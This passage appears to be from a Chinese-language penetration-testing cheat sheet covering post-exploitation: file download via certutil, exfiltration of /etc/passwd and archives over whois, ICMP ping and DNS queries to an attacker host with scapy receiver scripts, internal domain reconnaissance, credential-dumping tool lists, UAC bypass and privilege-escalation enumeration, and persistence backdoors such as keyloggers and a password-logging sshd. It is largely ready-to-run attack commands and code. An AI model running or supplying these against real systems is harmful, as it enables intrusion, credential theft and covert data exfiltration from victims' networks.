material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">rsync -av /databack root@192.168.78.192::www</span></span></code></pre></div><p>certutil.exe </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">certutil.exe -urlcache -split -f http://site.com/file</span></span></code></pre></div><p>copy</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">copy \\IP\ShareName\file.exe file.exe</span></span></code></pre></div><p>WHOIS<br>接收端 Host B:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nc -vlnp 1337 | sed "s/ //g" | base64 -d </span></span></code></pre></div><p>发送端 Host A:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">whois -h host_ip -p 1337 `cat /etc/passwd | base64`</span></span></code></pre></div><p><a href="https://twitter.com/mubix/status/1102780436118409216">WHOIS + TAR</a><br>First: </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it</span></span></code></pre></div><p>Next</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits</span></span></code></pre></div><p>Finally</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv #to get the files out</span></span></code></pre></div><p>PING<br>发送端:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done</span></span></code></pre></div><p>接收端<code>ping_receiver.py</code>:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">import sys</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">try:</span></span><span class="line"><span style="color: #babed8"> from scapy.all import *</span></span><span class="line"><span style="color: #babed8">except:</span></span><span class="line"><span style="color: #babed8"> print("Scapy not found, please install scapy: pip install scapy")</span></span><span class="line"><span style="color: #babed8"> sys.exit(0)</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">def process_packet(pkt):</span></span><span class="line"><span style="color: #babed8"> if pkt.haslayer(ICMP):</span></span><span class="line"><span style="color: #babed8"> if pkt[ICMP].type == 8:</span></span><span class="line"><span style="color: #babed8"> data = pkt[ICMP].load[-4:]</span></span><span class="line"><span style="color: #babed8"> print(f'{data.decode("utf-8")}', flush=True, end="", sep="")</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">sniff(iface="eth0", prn=process_packet)</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python3 ping_receiver.py</span></span></code></pre></div><p>DIG<br>发送端:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done</span></span></code></pre></div><p>接收端<code>dns_reciver.py</code>:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">try:</span></span><span class="line"><span style="color: #babed8"> from scapy.all import *</span></span><span class="line"><span style="color: #babed8">except:</span></span><span class="line"><span style="color: #babed8"> print("Scapy not found, please install scapy: pip install scapy")</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">def process_packet(pkt):</span></span><span class="line"><span style="color: #babed8"> if pkt.haslayer(DNS):</span></span><span class="line"><span style="color: #babed8"> domain = pkt[DNS][DNSQR].qname.decode('utf-8')</span></span><span class="line"><span style="color: #babed8"> root_domain = domain.split('.')[1]</span></span><span class="line"><span style="color: #babed8"> if root_domain.startswith('gooogle'):</span></span><span class="line"><span style="color: #babed8"> print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">sniff(iface="eth0", prn=process_packet)</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python3 dns_reciver.py</span></span></code></pre></div><p>… </p><h3 id="搭建-HTTP-server"><a href="#搭建-HTTP-server" class="headerlink" title="搭建 HTTP server"></a>搭建 HTTP server</h3><p>python2</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python -m SimpleHTTPServer 1337</span></span></code></pre></div><p>python3</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python -m http.server 1337</span></span></code></pre></div><p>PHP 5.4+</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">php -S 0.0.0.0:1337</span></span></code></pre></div><p>ruby</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ruby -run -e httpd . -p 1337</span></span></code></pre></div><p>Perl</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'</span></span></code></pre></div><p>busybox httpd</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">busybox httpd -f -p 8000</span></span></code></pre></div><h2 id="内网信息搜集"><a href="#内网信息搜集" class="headerlink" title="内网信息搜集"></a>内网信息搜集</h2><h3 id="本机信息搜集"><a href="#本机信息搜集" class="headerlink" title="本机信息搜集"></a>本机信息搜集</h3><h4 id="1、用户列表"><a href="#1、用户列表" class="headerlink" title="1、用户列表"></a>1、用户列表</h4><p>windows用户列表<br>分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户 </p><h4 id="2、进程列表"><a href="#2、进程列表" class="headerlink" title="2、进程列表"></a>2、进程列表</h4><p>析杀毒软件/安全监控工具等<br>邮件客户端<br>VPN<br>ftp等 </p><h4 id="3、服务列表"><a href="#3、服务列表" class="headerlink" title="3、服务列表"></a>3、服务列表</h4><p>与安全防范工具有关服务[判断是否可以手动开关等]<br>存在问题的服务[权限/漏洞]</p><h4 id="4、端口列表"><a href="#4、端口列表" class="headerlink" title="4、端口列表"></a>4、端口列表</h4><p>开放端口对应的常见服务/应用程序[匿名/权限/漏洞等]<br>利用端口进行信息收集</p><h4 id="5、补丁列表"><a href="#5、补丁列表" class="headerlink" title="5、补丁列表"></a>5、补丁列表</h4><p>分析 Windows 补丁<br>第三方软件[Java/Oracle/Flash 等]漏洞</p><h4 id="6、本机共享"><a href="#6、本机共享" class="headerlink" title="6、本机共享"></a>6、本机共享</h4><p>本机共享列表/访问权限<br>本机访问的域共享/访问权限</p><h4 id="7、本用户习惯分析"><a href="#7、本用户习惯分析" class="headerlink" title="7、本用户习惯分析"></a>7、本用户习惯分析</h4><p>历史记录<br>收藏夹<br>文档等 </p><h4 id="8、获取当前用户密码工具"><a href="#8、获取当前用户密码工具" class="headerlink" title="8、获取当前用户密码工具"></a>8、获取当前用户密码工具</h4><h5 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h5><ul><li><a href="https://github.com/gentilkiwi/mimikatz">mimikatz</a> </li><li><a href="https://github.com/vergl4s/pentesting-dump/tree/master/net/Windows/wce_v1_42beta_x64">wce</a> </li><li><a href="https://github.com/peewpw/Invoke-WCMDump">Invoke-WCMDump </a></li><li><a href="https://github.com/giMini/mimiDbg">mimiDbg </a></li><li><a href="https://github.com/AlessandroZ/LaZagne">LaZagne</a></li><li><a href="http://launcher.nirsoft.net/downloads/">nirsoft_package</a></li><li><a href="https://github.com/quarkslab/quarkspwdump">QuarksPwDump</a> <a href="https://github.com/mcandre/fgdump">fgdump</a></li><li>星号查看器等</li></ul><h5 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h5><ul><li><a href="https://github.com/AlessandroZ/LaZagne">LaZagne</a> </li><li><a href="https://github.com/huntergregal/mimipenguin">mimipenguin</a></li></ul><h5 id="浏览器"><a href="#浏览器" class="headerlink" title="浏览器"></a>浏览器</h5><ul><li><a href="https://github.com/moonD4rk/HackBrowserData">HackBrowserData</a></li><li><a href="https://github.com/djhohnstein/SharpWeb">SharpWeb</a></li><li><a href="https://github.com/GhostPack/SharpDPAPI">SharpDPAPI</a></li><li><a href="https://github.com/hayasec/360SafeBrowsergetpass">360SafeBrowsergetpass</a></li></ul><h5 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h5><ul><li><a href="https://github.com/RcoIl/SharpDecryptPwd">SharpDecryptPwd</a></li><li><a href="https://github.com/TideSec/Decrypt_Weblogic_Password">Decrypt_Weblogic_Password</a></li><li><a href="https://github.com/jas502n/OA-Seeyou">OA-Seeyou</a></li></ul><h3 id="扩散信息收集"><a href="#扩散信息收集" class="headerlink" title="扩散信息收集"></a>扩散信息收集</h3><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><h5 id="常用端口扫描工具"><a href="#常用端口扫描工具" class="headerlink" title="常用端口扫描工具"></a>常用端口扫描工具</h5><ul><li><a href="https://nmap.org/">nmap</a> </li><li><a href="https://github.com/robertdavidgraham/masscan">masscan</a> </li><li><a href="https://github.com/zmap/zmap">zmap</a></li><li>s扫描器 </li><li>自写脚本等 </li><li>NC </li><li>…</li></ul><h4 id="内网拓扑架构分析"><a href="#内网拓扑架构分析" class="headerlink" title="内网拓扑架构分析"></a>内网拓扑架构分析</h4><ul><li>DMZ</li><li>管理网</li><li>生产网</li><li>测试网</li></ul><h4 id="常见信息收集命令"><a href="#常见信息收集命令" class="headerlink" title="常见信息收集命令"></a>常见信息收集命令</h4><p>ipconfig:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ipconfig /all ------> 查询本机 IP 段,所在域等</span></span></code></pre></div><p>net:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">net user ------> 本机用户列表</span></span><span class="line"><span style="color: #babed8">net localgroup administrators ------> 本机管理员[通常含有域用户]</span></span><span class="line"><span style="color: #babed8">net user /domain ------> 查询域用户</span></span><span class="line"><span style="color: #babed8">net group /domain ------> 查询域里面的工作组</span></span><span class="line"><span style="color: #babed8">net group "domain admins" /domain ------> 查询域管理员用户组</span></span><span class="line"><span style="color: #babed8">net localgroup administrators /domain ------> 登录本机的域管理员</span></span><span class="line"><span style="color: #babed8">net localgroup administrators workgroup\user001 /add ----->域用户添加到本机 net group "Domain controllers" -------> 查看域控制器(如果有多台)</span></span><span class="line"><span style="color: #babed8">net view ------> 查询同一域内机器列表 net view /domain ------> 查询域列表</span></span><span class="line"><span style="color: #babed8">net view /domain:domainname</span></span></code></pre></div><p>dsquery </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">dsquery computer domainroot -limit 65535 && net group "domain</span></span><span class="line"><span style="color: #babed8">computers" /domain ------> 列出该域内所有机器名</span></span><span class="line"><span style="color: #babed8">dsquery user domainroot -limit 65535 && net user /domain------>列出该域内所有用户名</span></span><span class="line"><span style="color: #babed8">dsquery subnet ------>列出该域内网段划分</span></span><span class="line"><span style="color: #babed8">dsquery group && net group /domain ------>列出该域内分组 </span></span><span class="line"><span style="color: #babed8">dsquery ou ------>列出该域内组织单位 </span></span><span class="line"><span style="color: #babed8">dsquery server && net time /domain------>列出该域内域控制器 </span></span></code></pre></div><h3 id="第三方信息收集"><a href="#第三方信息收集" class="headerlink" title="第三方信息收集"></a>第三方信息收集</h3><ul><li>NETBIOS 信息收集 </li><li>SMB 信息收集 </li><li>空会话信息收集 </li><li>漏洞信息收集等</li></ul><h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h2><h3 id="Windows-1"><a href="#Windows-1" class="headerlink" title="Windows"></a>Windows</h3><h4 id="BypassUAC"><a href="#BypassUAC" class="headerlink" title="BypassUAC"></a>BypassUAC</h4><h5 id="常用方法"><a href="#常用方法" class="headerlink" title="常用方法"></a>常用方法</h5><ul><li>使用IFileOperation COM接口</li><li>使用Wusa.exe的extract选项</li><li>远程注入SHELLCODE 到傀儡进程</li><li>DLL劫持,劫持系统的DLL文件</li><li>eventvwr.exe and registry hijacking</li><li>sdclt.exe</li><li>SilentCleanup</li><li>wscript.exe</li><li>cmstp.exe</li><li>修改环境变量,劫持高权限.Net程序</li><li>修改注册表HKCU\Software\Classes\CLSID,劫持高权限程序</li><li>直接提权过UAC</li></ul><h5 id="常用工具"><a href="#常用工具" class="headerlink" title="常用工具"></a>常用工具</h5><ul><li><a href="https://github.com/hfiref0x/UACME">UACME </a></li><li><a href="https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC">Bypass-UAC </a></li><li><a href="https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC/Yamabiko">Yamabiko </a></li><li>…</li></ul><h4 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h4><ul><li>windows内核漏洞提权</li></ul><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>检测类:<a href="https://github.com/GDSSecurity/Windows-Exploit-Suggester">Windows-Exploit-Suggester</a>,<a href="https://github.com/brianwrf/WinSystemHelper">WinSystemHelper</a>,<a href="https://github.com/bitsadmin/wesng">wesng</a></p></blockquote><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>利用类:<a href="https://github.com/SecWiki/windows-kernel-exploits">windows-kernel-exploits</a>,<a href="https://github.com/AlessandroZ/BeRoot.git">BeRoot</a></p></blockquote><ul><li>服务提权</li></ul><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>数据库服务,ftp服务等</p></blockquote><ul><li>WINDOWS错误系统配置 </li><li>系统服务的错误权限配置漏洞 </li><li>不安全的注册表权限配置 </li><li>不安全的文件/文件夹权限配置 </li><li>计划任务 </li><li>任意用户以NT AUTHORITY\SYSTEM权限安装msi </li><li>提权脚本</li></ul><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p><a href="https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1">PowerUP</a>,<a href="https://github.com/rsmudge/ElevateKit">ElevateKit</a></p></blockquote><h3 id="Linux-1"><a href="#Linux-1" class="headerlink" title="Linux"></a>Linux</h3><h4 id="内核溢出提权"><a href="#内核溢出提权" class="headerlink" title="内核溢出提权"></a>内核溢出提权</h4><p><a href="https://github.com/SecWiki/linux-kernel-exploits">linux-kernel-exploits </a></p><h4 id="计划任务"><a href="#计划任务" class="headerlink" title="计划任务"></a>计划任务</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">crontab -l</span></span><span class="line"><span style="color: #babed8">ls -alh /var/spool/cron</span></span><span class="line"><span style="color: #babed8">ls -al /etc/ | grep cron</span></span><span class="line"><span style="color: #babed8">ls -al /etc/cron*</span></span><span class="line"><span style="color: #babed8">cat /etc/cron*</span></span><span class="line"><span style="color: #babed8">cat /etc/at.allow</span></span><span class="line"><span style="color: #babed8">cat /etc/at.deny</span></span><span class="line"><span style="color: #babed8">cat /etc/cron.allow</span></span><span class="line"><span style="color: #babed8">cat /etc/cron.deny</span></span><span class="line"><span style="color: #babed8">cat /etc/crontab</span></span><span class="line"><span style="color: #babed8">cat /etc/anacrontab</span></span><span class="line"><span style="color: #babed8">cat /var/spool/cron/crontabs/root</span></span></code></pre></div><h4 id="SUID"><a href="#SUID" class="headerlink" title="SUID"></a>SUID</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">find / -user root -perm -4000 -print 2>/dev/null</span></span><span class="line"><span style="color: #babed8">find / -perm -u=s -type f 2>/dev/null</span></span><span class="line"><span style="color: #babed8">find / -user root -perm -4000 -exec ls -ldb {} \;</span></span></code></pre></div><p>寻找可利用bin:<a href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></p><h4 id="系统服务的错误权限配置漏洞"><a href="#系统服务的错误权限配置漏洞" class="headerlink" title="系统服务的错误权限配置漏洞"></a>系统服务的错误权限配置漏洞</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">cat /var/apache2/config.inc</span></span><span class="line"><span style="color: #babed8">cat /var/lib/mysql/mysql/user.MYD</span></span><span class="line"><span style="color: #babed8">cat /root/anaconda-ks.cfg</span></span></code></pre></div><h4 id="不安全的文件-文件夹权限配置"><a href="#不安全的文件-文件夹权限配置" class="headerlink" title="不安全的文件/文件夹权限配置"></a>不安全的文件/文件夹权限配置</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">cat ~/.bash_history</span></span><span class="line"><span style="color: #babed8">cat ~/.nano_history</span></span><span class="line"><span style="color: #babed8">cat ~/.atftp_history</span></span><span class="line"><span style="color: #babed8">cat ~/.mysql_history</span></span><span class="line"><span style="color: #babed8">cat ~/.php_history</span></span></code></pre></div><h4 id="找存储的明文用户名,密码"><a href="#找存储的明文用户名,密码" class="headerlink" title="找存储的明文用户名,密码"></a>找存储的明文用户名,密码</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">grep -i user [filename]</span></span><span class="line"><span style="color: #babed8">grep -i pass [filename]</span></span><span class="line"><span style="color: #babed8">grep -C 5 "password" [filename]</span></span><span class="line"><span style="color: #babed8">find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla</span></span></code></pre></div><h2 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h2><h3 id="系统后门"><a href="#系统后门" class="headerlink" title="系统后门"></a>系统后门</h3><h4 id="Windows-2"><a href="#Windows-2" class="headerlink" title="Windows"></a>Windows</h4><h5 id="1、密码记录工具"><a href="#1、密码记录工具" class="headerlink" title="1、密码记录工具"></a>1、密码记录工具</h5><p>WinlogonHack<br>WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。<br>键盘记录器<br>安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。<br>NTPass<br>获取管理员口令,一般用 gina 方式来,但有些机器上安装了 pcanywhere 等软件,会导致远程登录的时候出现故障,本软件可实现无障碍截取口令。<br>Linux 下 openssh 后门<br>重新编译运行的sshd服务,用于记录用户的登陆密码。</p><h5 id="2、常用的存储Payload位置"><a href="#2、常用的存储Payload位置" class="headerlink" 